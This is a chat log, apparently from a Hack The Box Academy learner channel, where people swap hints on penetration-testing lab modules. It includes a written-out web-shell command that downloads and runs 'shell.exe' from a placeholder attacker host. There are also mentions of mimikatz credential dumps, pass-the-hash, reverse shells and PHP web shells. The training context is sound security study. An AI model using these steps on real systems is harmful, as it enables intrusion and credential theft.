Anyone able to give me a hint on Active Directory Attacks: Skill Assessment 1? I've solved the first three questions but I'm really not understanding how to pivot to MS01 or DC01.
Is the foothold machine dual-homed? You might have to use chisel
Is it me or is the SQL map hard :/
The SQL injection module is harder imo, but since I did i first, I found sqlmap easy. Are you stuck somewhere?
haha kinda skipped it and moved on to command injections for now
I guess the SQL injection has an overwhelming load of text/information
Yeah, but it is a well done module. I learned a lot. Take your time
Yup, thanks for the offer!
Can i get a nudge on command injections?
@summer lake sure, which section / question?
im working on the sql injection fundamentals atm and enjoying it actually. i did sqlmap module first and then going back to this and im having a decent time at it. the module so far is well done.
Hello @west canopy I am trying to update it to enabled in the browser inspector and then click on the button to get the flag and it is still not working after 20 tries. I am wondering if I am doing something wrong?
@agile bloom keep trying, it took me a bunch of tries
understood. appreciate it
there is probably a better way to do it using burpsuite but eventually it will spit out the flag
I got it! Thanks again sir!
np 🙂
I tried the burpsuite route, but was finally able to do it through the browser
if this is against the rules then can someone plz tell me but i want someone to try to pull my ip, i would be impressed.
you from turkey?
hey dudes i need late room hints ? pls
Any tip for using sed to delete sections of text between ":". I'm trying to find out the most common password in a list of this format: user : hash : password (no space) for final hashcat skills assessment. I believe sed could help, but it's hard to use.
@sweet heron I did it using a combination of cut, sort, and uniq
I'm looking at cut right now. It's promising!
I've got 84.25% of the hashes for now.
Got it! Ok, cut, now that's a lot more easy to use than sed XD
yes sed is obnoxious lol
Has anyone finished the Password Attacks Module? I am starting to think that most of these password attacks are built to take an obnoxiously long time...
I did and you're right. They should've put the passwords/users earlier in the lists and maybe have a smaller rule file. You're stuck somewhere?
Yeah working on Password Mutations I was able to make the mutated password list but I now have 92,000+ passwords that hydra has to work through which has already been running for 10+ minutes haha
yup! It takes a bit, but you'll get to it.
at this rate may even run longer than the box has time left for
SQL Injection Fundamentals CRUSHED in simple hours
muahaha
10/10 well explained module
I agree, really fun too.
Hi can anyone give a nudge on the command injection skills assessment? Can't seem to find an attack vector
@summer lake try moving to file to the TMP directory and intercept the request
They'll get back to you, just give it time, we unfortunately have to do that stuff for legal reasons
wow this is exhausting.....
Hello all, I'm working on the Information Gathering - Web Edition module and I'm stuck on the Active Subdomain enumeration section question that asks for a TXT record "Find and submit the contents of the TXT record as the answer." Been using dig and nslookup with no luck. Could someone DM me or give me a nudge on this? Think I've been stuck in a rabbit hole for a while now. 😅 I'm able to perform the zone transfer but I don't think I'm looking in the right place for the TXT record.
@primal salmon DM me 🙂
hello can anyone nudge me for the command injection skills assessment? :/
Hello all, I want to crack a pass and I know he must have at least one special char so I want to delete the lines without special ?
I tried that but I don't have enough privileges to run a elevated powershell
still stuck ?
all good. Thank you! 🙂
can anyone suggest me best VPN software for Windows (Free) with easily hand able.
Also Safe....
For the file upload attacks: blacklist filters:
why is it all are 200 success with the same match length?...
I'm doing the Web Service & API Attacks module, and have been having major issues with intermittent connectivity to the target host. It happens when connecting from both the provided VDI instances, and my local workstation over the VPN. It will work for a while, then I won't be able to connect at all for a few minutes. Resetting the target doesn't help.
try chatting with the support team they will help u
still having issues
oh its their server issue?
anyone around thats done the command injections module? i think im stuck on the last section before the skill assessment
Writing files?
no its the Advanced Command Obfuscation section
oh oops, haven't done it yet.
F
Im having trouble copy and pasting inside the workstation :(
I dont know why but whenever I try using ssh it wont let me type or paste anything in the password part
in bash?
yeah
does it give you a separate password field after you input the other ssh information?
ok it will not show you the password for security reasons while you are entering the password
^^^^
yup
ahhh that makes so much sense
thank you :D
Hello guys, can anyone help me? I'm stuck in last question of the File Inclusion module
what wordlist you use on ffuf assessment? I've tried a couple and can't get the third question, so stuck
Depends on what to fuzz. I used the lists they talk about in the module: burp-parameter-names.txt, default-web-root-directory-linux/windows.txt, web-extensions.txt, directory-list-2.3-small.txt
Yes I can probably help, where are you stuck exactly?
@rough pelican Try recreating the example "Viewing Sticky Notes Data in Powershell"
Feel free to DM me if you still need help 🙂
Yes, directory-list-2.3-small.txt should work
Hi! Literally I can’t answer the first question on debugger path- 🤦♀️I got an output with curl but it just says it’s been moved in the output. Am I just misunderstanding what they are looking for??? SOS.
@sacred arch which module / section?
Tadaa! Basic Toolset completed!
@west canopy did you get the MS01 access? I'm stuck..
@shadow verge not yet. I am reading through the module again. I feel like it's going to be something from these sections:
I think there was no trusts regarding bloodhound
I'll check with powerview too, this is hard assessment
Right, to run a local bloodhound collector we need to be connected as a domain user. I also tried running Bloodhound-Python with the sql user's credentials but that didn't work either.
I ran bloodhound on system, but there was bug first
so i can't run it
but then i mentioned it to mrb3n and now i can run sharphound there
locally with system privs
yes it was because active directory web services was not running
Yea the Import-ActiveDirectory powershell cmdlet was not working for me either
or whatever it's called
But PowerView was working fine
yep
I'm a little confused. Because the initial target does not have LDAP enabled. For stuff like bloodhound , does it gather data via querying the domain controller?
Yes I think it does, not sure tho
Get-DomainTrust and Get-DomainTrustMapping does not give any output on powerview
I found cached credentials for administrator@INLANEFREIGHT.local domain account but can't crack it
with mimikatz
ah
i was thinking it had to be password re-use or something
maybe use Enter-PSSession to access the other machines with a different domain account but re using the sql user's password
Yes it is hard to use the pssession without fully interactive shell
I still need to try it. I'm not using the web shell though, first thing I did was upload a netcat executable so i could have a terminal based shell
no but i get the full dumps from mimikatz
I just used web shell wget http://attacker.ip/shell.exe -o C:\windows\temp\shell.exe
and ran the shell with C:\windows\temp\shell.exe
ah nice
I wonder if the local admin ntlm hash is reusable in the internal machines
I don't know how to login with NTLM from windows so I don't know
right , i can't think of any way to pass the hash in this scenario
PsExec.exe would work if you guys can get RDP access
You can try to pass the admin hash and execute cmd.exe
oh
thanks @west canopy @sweet heron those little nudges help me from going completely insane. I love this stuff!
Web Proxies - Skills Assessment I am stuck trying in to set up the request to properly take the cookie and not return errors. I have mirrored the example above and my encoding is matching up to 88 characters for all entries, but I am only getting either all 200 matches or all 400 matches. Any help would be greatly appreciated
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
Can somebody give me an example of SQL injection on an API endpoint, for example Web service and API attacks >> Information Disclosure >> Q2. I’m sure its super simple, but for whatever reason I am not getting anywhere with and my brain is friggin fried
Hi, I'm doing the 'web requests' POST but I'm blocked I think I'm close to the end but do not know where to go
@west canopy Thanks for the help 🙂
Web requests first section 🙃
Ugh I hate this web requests section. So i'm at the skills assessment part where I'm trying to fuzz the last character of the md5 cookie but i'm going nowhere. I'm wondering if i'm not re-encoding it right or what
password attacks
was this a user error or problem with the module? I'm in the same boat, I've reloaded the page a few times and watched the requests
@sacred arch have you tried running curl against the target?
@round lagoon Feel free to DM me and i can show you how to do it 🙂
ok burp is just weird, got it thnx 🙂 🙂
@silver laurel I did as the guide told me, but I'm not ruling out error ID-10-T lmao
😦 lol yeah maybe but I’ve read through the headers as well and I don’t see anything.
Has anyone been able to get the flag for: https://academy.hackthebox.com/module/35
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.
Thanks @mortal basin for the excellent "command injection" module, I really enjoyed it 😃
use curl, also read the section on request headers
hi, anyone can give me some nudges on skill assessment for broken authentication?
Hey, can someone give me some hints for the skill assessment for command injections. Stuck since 3 Days😅
Anyone able to answer an assembly question (Intro to Assembly Language - Conditional Branching)? Got the code to stop looping but my answer to the question is apparently incorrect
Nevermind, got it. I was misunderstanding what hex value the question was asking for
sure, you can DM
So I seem to be banging my head against a wall here for web requests HTTP if someone is willing to clue me in on some things, I’ve already gotten further than I have been now I’m just stuck
I’m stuck there also but I can see the flag.txt attachment but I can’t seem to extract it
are you still stuck? If so, dm me
Can anyone help me with this: The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt"
I can't seem to run the bash script
bash script worked for me fine
just copy and paste it
yeah it worked now
idk how i ran it...
suddenly appeared in my folder.
But thanks @leaden quail 🙂
can anyone help with file uploads pls?
dm
still need help ):
hello in Active Directory Enumeration & Attacks
page LLMNR/NBT-NS Poisoning - from Linux
i cant crack the hashes that responder gave me hashcat keep on saying exhausted i use rockyou wordlist
my command : .\hashcat.exe -a 0 -m 5600 .\hashes\XXXXXXX.txt .\wordlist\rockyou.txt
it looks like the hashes in the wley.txt file aren’t formatted right so Hashcat is erroring out
yeah i am trying to upgrade responder on the vm that htb provide
to see if that help
it changed nothing
the top one is the new one
so updating responder did change something but i still cant crack it
Try letting responder run a little bit longer and see if you get any other hashes from different users.
i will try again
Hi My friend,
I am trying to solve the challenge "Bruteforcing Cookies" from the "Broken authentication" module.
In question 2, we should try to decode the cookie after logging in with htbuser:htbuser. I cannot understand how to detect the type of cookie encoding algorithm and then decode it.
example cookie: 5s4539pp9etrtf6hlhg04o4ob8
plz help me.
sorry havent bought the module yet
i keep on getting exhausted
It seems to me that the hash file is not valid
Maybe you have more than one line? A bad copy paste?
GJ 🙂
it works
To fix this issue for anyone facing the same : I installed the latest cuda driver on my host, used the latest responder ( downloaded from github ) the one on the box give different hashes, make sure the hash is on 1 line after copying ( no spaces ).
also thanks on mrb3n, Itnbob for the response
Hi, I need help with the Password Attacks module section Skills Assessment. In the first lab (Password Attacks Lab - Easy), I couldn't even brute force anything because it took me 3-4 seconds to send 1 request. I let it run for like 80 minutes, and it was able to brute force 8 users. Am I doing anything wrong? For the second lab (Password Attacks Lab - Medium), I did manage to get the zip file, but after extracting the hash, I couldn't crack it. I try every wordlist I have (rockyou, fasttrack, hashkiller-dict, ..)
dm
Anyone I can dm for the file upload attacks skill assessment?
Plz help me
guy i need help on windows file transfer
@gray cypress are you checking the box for "remember me" when logging in? You want to decode the HTBPERSISTENT cookie
@rough pelican Try running the powershell command to view sticky notes
Send screen shot
anyone got a hint for finding CT059 credentials in AD Enumeration and Attacks Skills assessment Part 2 ?
@shadow verge Were you able to finish assessment Part 1?
Yes
Any chance I can shoot you a DM?
Can you guys help me with the ssh practice on the academy? Im hard stuck there hehe
Anyone mind helping me out with the SQLMap Essentials Skills Assesment?
Where are you stuck?
@CryptoAnar84 Skills assessment flag. I have a hypothesis a POST request needs to be exploited, but can't figure out the parameter. I have been using burp to help gather information.
I did that section a while ago, but my notes are not great - if you are desperate, send me a DM and I will try to help
It is a post request indeed. You'll find the vulnerability is made in json. Check around the shop page. You'll know when you find it.
I found it, but I am missing something. Tried WAF bypasses, etc. Do I need certain formatting because it is JSON?
No, you just have to fine tune your sqlmap command. Check the bypassing section. You'll need some bypass options and carefully check the output of the command. It will also suggest ways to bypass some restrictions.
for the XSS - Phishing module, did anyone else have issues with using port 80 like it says? I've tried other ports but not working
I'm at defacing section rn, will let you know when I get there.
thank youuuu
i think something may be using port 80 for listening but i looked at ss -ntlp and theres no service to shut down
Hello guys, can someone help me with an issue? I'm stuck at the "Information Gathering - Web Edition" - Active Subdomain Enumeration, and each time I try to use the nslookup tool to scan the domain "inlanefreight.htb", it returns me this message "** server can't find inlanefreight.htb: NXDOMAIN **"
I've already added the vhost to the /etc/hosts file, and nothing seems to work
Hello, need help for the Q3 - Skills Assessment - Information Gathering, i tried a lot of thing but idk impossible the submit the right NS
for the skill assessment in command injections im trying to figure out which part of the webpage is my injection point, can i get a hint?
I am working on Tier 1 - Responder and I can not get the web page to open. I have a pi running pi-hole with a recursive dns server. I am assuming that is the reason. Anyone else run into this?
It worked fine for me. Might be on your end.
If anyone else runs into this, go to Pihole/admin/cname_records.php. I added an entry Domain: IP address, Target: unika.htb
why i cannot write on other chanels. how do i know if i get banned?
Looking for some friendly guidance on Web Services and API attacks module assessment. If anybody is available?
DM me what you have so far and I will see if I can help you.
Try adding it to /etc/resolv.conf too.
yeah im hardstuck now on this skills assessment for command injections someone please help
In the session hijacking section in the XSS module, the target's registration page doesn't work: nothing happen when I click on "register"
I've already done it, but it doesn't work either
have you tried moving a file to tmp?
i figured it out with some assistance
i figured out the injection point but was stuck on not really receiving additional feedback from using commands
but got it figured out
ah i see, nice!
i'm still stuck on the file upload attacks skill assessment 😅 but doing another module for now
anyone else having connectivity issues? or is it just me?
Did they change the answer of command injection module, identifying filters? The character that fits the answer is blacklisted for me. Another one is not blacklisted...
Ok, I see its url encoded version is working, but the & still works (but not its encoded version). So there are two good answers, right?
Finally - I've completed the "Starting Point' content, and now I'm starting the 'Beginner Track". Does this still use the 'Starting Point' VPN, or do I need to disconnect and download another ovpn file?
Yes, starting point boxes use their own VPN file . While live and retired boxes use a separate VPN file.
@spice olive DM me 🙂
@plucky bobcat Feel free to DM me as well !
Information Gathering Web-Edition: Subdomain enumeration. I have been stuck on this section for a while. Help would be appreciated.
dm
Xss can lead to rce -e.g. CVE-2021-37794- From XSS to RCE -or htb retired machine CrossFit-. The retired book machine has an example XSS Fileread
thanks !!
My account was suspended because I wanted to change my name, I sent a message to support and to whom there is no response now i have 3 days I emailed technical support, what do I do?
It's been the weekend
You'll probably get a reply tomorrow because it's bank holiday today
It's Holiday for AU as well today. @jagged zenith what do you mean email?
We have a bubble chat support
But i send support before 3 days
What do you mean?
I sent to support on April 29th
In order to solve this problem
But it has not been resolved
Create a support ticket rather than email.
How that
Okay i create a support ticket
could I please get some help with Broken authentication module weak bruteforce protections second question?
DM
Can someone help me with the Web Attacks module in the Blind Data Exfiltration section. The tool XXEinjector doesn't get anything out and when I work with Burp and the PHP script I don't get a response from the server.
can someone help me please in File Upload Attacks Skills Assessment - File Upload Attacks?
i cant find the path for uploaded files
Hi
thank you for hint. i forgot to check box "remember me"
gm academy
Afternoon all, I'm on Nmap Enum. What is the best way to enum FTP, SMB, SMTP and Shares?
Are the nmap scripts the best only way?
i.e. nmap -p 445 --script smb-enum-shares <IP>
Good morning. Whose ready to finish some Modules? 💪💪💪
Hi yaoi74, are you able to help with my question above? I'm on the Nmap Enum Module
Yes, but I am busy so it may take me some time to help you out. Feel free to dm.
hello everyone
who can give me a hint with this AD question:
What AD object handles all authentication requests for a domain?
Think of it as a two stage attack. The first goal is to compromise the source code, the second goal is to get RCE via file upload attack. Feel free to DM me.
I tried some with no success
If you read the section your answer is there.
or I really don't know read or .........
has anyone done the windows buffer overflow module? Im on the skills assessment but the program I download just comes up a black screen.
Same here. I can't find the member of Remote Management Users group. Did you succeed in the end?
VM
the 2nd option is what I thought from the beginning but LoL "s" made me crazy
I run a Kali VM. I did install most of the tools myself except for powershell which I have not really needed much.
looks like powershell is installed in kali by default
I dont lose internet
My vpn is connected all the time and I still have full access
no
I also dont use virtual box
My VM runs on a hyperv server
one network interface, NAT enabled
@lethal atlas come over to the dark side and use Parrot 😉
LOL
I have considered it but the time it would take to move all my tools and notes....ugh
hey @blissful verge can you tell me if the win32bof.exe file from windows buffer overflow is supposed to only open a black screen?
is that the skills assessment?
yes
yes its intended to just print errors
ok I was just making sure there wasnt something wrong on my end. Thank you.
no problem!
Am I the only one who finds windows stuff too overwhelming? I am doing AD (Tier 0 one) now and I can't fit so much terminology and stuff in my head anymore. I hope I can get better one day 
hello group, sort of stuck or puzzled. on intro to bash, comparison, I successfully wrote the script down to the end and used tail -c 20 to print the last characters and get 15 lines, which I have no idea where the answer the module is looking for is within these lines?? please any guidance would be appreciated. thanks
one word
dm me
Umm still confused 😄
Ahh I am so dumb
it said messages in the question so I don't have to repeat it in the answer
Hey i just started learning htb after i was told to try and learn using it after doing some picoCTFs and having fun doing them. Is there some other stuff i should learn before getting into this, im on the getting started module after finishing the tutorial one, and i feel dumb and dont understand a lot of what its talking about
i dont know what any of this means, is there somewhere else im suppose to learn first before getting into htb?
@plucky plover Honestly most of that stuff isn't too relevant imo, just an overview of the different file types for Virtual Machines
ISO is what we used to burn to physical media like CDs or DVDs. You can still mount them virtually, and click all the installation options as if you were installing it on bare metal.
OVAs are pre-built virtual machines that you just double click and go, change your password, check for updates, and you're set. Definitely the easier way to get started, unless of course your goal is replacing one operating system within an entirely different one. But unless this is a secondary computer, I highly recommend against using a security focused distribution as your main OS.
so an OVA is like what im using, vmware with kali linux?
Exactly, a pre-built virtual machine that has all the defaults and whatnot configured for you out of the box. Definitely the way to go, as snapshotting and rolling back the machine is a whole lot easier than having to do a wipe and load of your entire computer.
The V is for virtual, and the A is for appliance. I am drawing a blank on what the O is for.
But you can also build your own virtual machines from scratch. One of the retired HTB machines actually required something to be done in Windows, and I remember in the IppSec video he did it in a brand new windows virtual machine. Microsoft will actually let you download Windows virtual machines with a 30-day license for free. Great for temporary projects.
Yeah, open, I should have guessed that.
So if an iso is on cds or dvds are those even used anymore? Most computer dont even come with places to put them anymore
Think of an ISO as more like a really big zip file. In fact, if you have 7zip installed on your machine, you can literally open up an ISO with it and see what is contained within.
Software like brasero, or command utilities like dd can be used to write out the contents of an ISO to an optical media. However, VMware and virtual box can also be pointed to an ISO file on your hard drive, and mount it as a virtual drive.
For instance, if you ever wish to play with a RaspberryPi computer, the instructions on how to get the operating system onto the micro SD card will involve using an ISO file as well. Of course in that instance, you will be using dd to extract it to an SD card, instead of a CD or DVD.
So an ISO is a file while an OSA is an application? Sorry im really confused
By the way, when learning hacking/anything IT related, if you don't understand something you should google it first. Will save you a lot of time
I like to think of ISO as a format used to save operating systems so you can download and install them. While not being true it still applies in most cases.
im too dumb to solve the first interactive section of the academy 😦
No way! To prove it, you were smart enough to say something in the chat. The dumb ones would have given up and walked away. What section are you working on?
i misspelled the answer lmao. im now starting with linux fundamentals. 🙂
Haha! Been there, done that.
yeah i will see how it will work...
i can skip things like history of linux right?
I don't recommend skipping anything haha. You never know when the knowledge might come in handy.
this is gonna be fun. english isnt even my mother language 🥶
i agree
Anyone able to give me a hint on Active Directory Attacks Skill Assessment II ? "Submit the contents of flag.txt on the Administrator Desktop on the SQL01 host". I was able to connect using mssqlclient.py , and can enable xp_cmdshell, but I still don't have permissions to access the flag.
Edit: Solved!
Stupid question on this "Introduction to Web Applications" module. The question is: What is the CSS "property: value" used to make an HTML element's text aligned to the left?
As a programmer, I am tempted to use p{text-align:left;} (since p is a HTML element), but the module marks this as wrong.
Or if you want to define the entire HTML document, you would use <html><style>p{text-align:left;}</style></html>
Finally got it! Thanks to everyone who helped me along the way @west canopy @lethal atlas. Was a fantastic voyage lol https://academy.hackthebox.com/achievement/443515/path/17
@final salmon now we just gotta take the exam!
@west canopy yeah lol terrified!
me too
makes 3 of us
@west canopy @final salmon @lethal atlas you 3 got this. Study up and jump in to the exam!
@unique valve I'm beefing up my skills. Just participated in Nahamcon and our team is looking forward to Cyber Apoc..
we came in 237 out of over 4000 so not bad.
can anyone assist with a reverse shell?
I will sure try
for some reason cant get pentestmonkey's reverse shell working and i think im messing up something obvious
is nc supposed to be on 0.0.0.0?
listening? yeah thats ok
ok and i altered the file already
and im connect to academy via openvpn
so im using that in the file
what module and are you working on
file upload attacks first section
2nd section*
its just doing a simple reverse shell via a file upload site
bypassing filters?
doesnt have any
its like the very first reverse shell they show to understand the concept
ok so Try to exploit the upload feature to upload a web shell and get the content of /flag.txt
?
yes you just got it
ok so if i use seclists obfuscated php web shell that should work then?
is there anything i need to change in that file normally?
Thank you I’m gonna try lol
weird, phpbash worked but seclists obfuscated bash did not
ok i understand why the obfuscated php shell didnt work, theres a password you need to incorporate with it as well, i just dont know the syntax to input it into the url and what it wants
😂
Hey I'm stuck at the file inclusion skills assessment, I've reached the admin panel but whenever I try to change my agent it ends up blank like this: '408 0 "-" "'
Sorry I left you hanging. We had a pretty good storm blow thru.
dm me
@lament crag DM me 🙂
don't be an idiot and accidentally remove your HTTP/1.1 lol
the little things get me all the time
can anyone assist me with the server-side module? Im having trouble setting up the nginx
what section
@summer lake DM me 🙂
haha you're too kind. Will dm you soon! I went ahead and will be finishing another module
the part where we have to paste some template into the nginx config ):
you can pretty much follow that section step by step
I felt like the directions weren't super granular. It took me quite a while before i got the config file working
and if you get an error, its pretty much hard to troubleshoot
@radiant dagger try googling "inlanefreight DNS records" and check the website cutestat.com
Thank you, that's nice.
Although, I'm confused why other tools can't get it
viewdns, domaintools are useless on that
I should just try dig TXT inlanefreight.com 🥲
Can anyone explain to me what I'm doing wrong? I'm doing the file transfer module and I'm stuck at the windows upload bit
hi to anyone who has done Web Attacks
When I curl -X OPTIONS , I am still unable to view the allowed http methods.
It shows me something like Allow: /, anyone knows why ?
what options are you trying?
@summer lake Allow: / means all if im not mistaken. Feel free to dm me
You need to find a directory that you have permission to write to.
Hi
hi
Anyone know well knowledge about CTF
Yes I want to doubt in ctf
hello
i have a question
if I want to have access to the courses on htb academy do I have to make a different subscription than the one on the ctf hack the box platform?
or if i have silver packet on the htb academy i have access to labs /
?
with ctf
The Academy platform is separate from the main HTB website
So you would have a separate account and subscription for each 🙂
Is that the module where you have to set up for tomcat? If so I had trouble on appending my template into the nginx config as well
Hello, everyone. I am having trouble with the Introduction to Web Applications module
The question is: What is the CSS "property: value" used to make an HTML element's text aligned to the left?
I assumed that the answer is {text-align:left;}, but HTB said that that isn't correct
@weary forum here is an example of aligning to center
Yup, you could use any HTML element such as p, h1, br to left align the text
your answer is right just needs to be formatted
try dropping your curly brackets and add a space between align: left
Ok, I will try that. Not sure why HTB doesn't like my answer
can i get some assistance on file upload attacks module, the blacklist filters section? i already fuzzed all extensions via ZAP that should work but none of them are giving me the feedback im expecting.
Anyone have hints for the Password Attack Easy Lab?
hey all a few changes to Pwnbox just FYSA:
- you can now sudo without typing a password
- CrackMapExec installed (need to be root to use)
- jq installed (needed for some web modules)
- PortSwigger CA cert added to Firefox for Burp Suite
- sshuttle and chisel installed
oh and a new module in the Jr Pentester path
C R
If anyone has hints for the Password Attack Easy Lab, please HMU if you get a chance 🙂
For the easy lab, you can use the original password list from the resource files. After, you need the mutated one.
❤️ thanks ❤️
i need help in information gathering - web edition module, active subdomain section questions. Tried methods in cheat sheet and nothing works. Any hint?
New module added today:
Vulnerability Assessment
Tier 0 - Easy - Offensive - 17 Sections - +10 - 2 hours
There are many ways to solve the questions in that section: dig, nslookup, scripts. The module gives you the basic idea but you have to expand on what you learn just a little. If you really get stuck DM me and I will help
Anyone got some hints in terms of usernames for the easy lab on password attacks?
dm if you still need help
hello @all...o/...I can't get any further with the third question in the "Using Web Proxies - Skill Assessment" module. could someone pls help me?
Are there any Turks here???
pm
guys can anyone help me please in Skills Assessment - File Upload Attacks?
i can not find the upload path
I need assistance on file upload attacks content type filters. I am 100% confused. The way the exercise is written is hard to follow, compared to everything else leading up to it.
This following question is linked to Cracking into Hack the Box, the GET method.
My current code to attempt to retrieve the flag is
curl 'http://157.245.42.82:30452/search.php?search=ls' -H 'Authorization: Basic YWRtaW46YWRtaW4=' returned with 'Walsall (UK)'
ended up getting it and honestly the answer seems rather simple now. For anyone else struggling with this question as a hint, the search box filters all the names using the parameters you entered in your search, e.g 'search=a' will bring forth all names containing an a.
dm
dm
Hello
gm
can anyone tell me why this is happening?
My ESP value is 00DFFB48
ERC --compare 00DFFB48 C:\Program Files\x64dbg\x32\plugins\ByteArray_1.bin
And I get:
Error: Incorrect parameters provided. Compare must be run as "ERC --compare <start address> <file containing bytes>
hey all, another thing. we just made a change to pwnbox to allow whois. this affects at least 1 web module
ok @surreal rain I tried with single and double quotes and still get the exact same error.
Resolved!!
I need a nudge in ADE&A Skills Assessment I
@hollow knot DM me
Hello everyone, I couldn't solve question 4 and 5 in "Active Subdomain Enumeration" module. Is there anyone who can help? I only have these two questions left to complete the module.
DM me
Ty 🙏
If someone did the Getting Started module, section Public Exploits, I need help on the way to solve it with searchsploit. I already found a way with Metasploit but I want to do both
Do not use ssh. You have to connect with "MySQL client" like it says in the question. Look in the lesson for examples.
@lethal atlas @west canopy Got the cert(s) gonna give it a go next Thursday.
Wish you the best of luck bro! Dont hesitate to ask for help.
Much appreciated! 
Sup all!
@lament crag Nop but it's a lil bit before
if anyone can give me a hint in the file upload attacks module it would be appreciated. been hard stuck for 2 going on 3 days now on the blacklist section question and trying to figure out which extension works.
These "questions" are not really useful. Maybe develop them to accept variations of the result
nvm found the extension 🤦♂️ it was an extension zap wasnt enumerating
@final salmon get it big dawg!
@west canopy I didn’t know but you get two attempts with it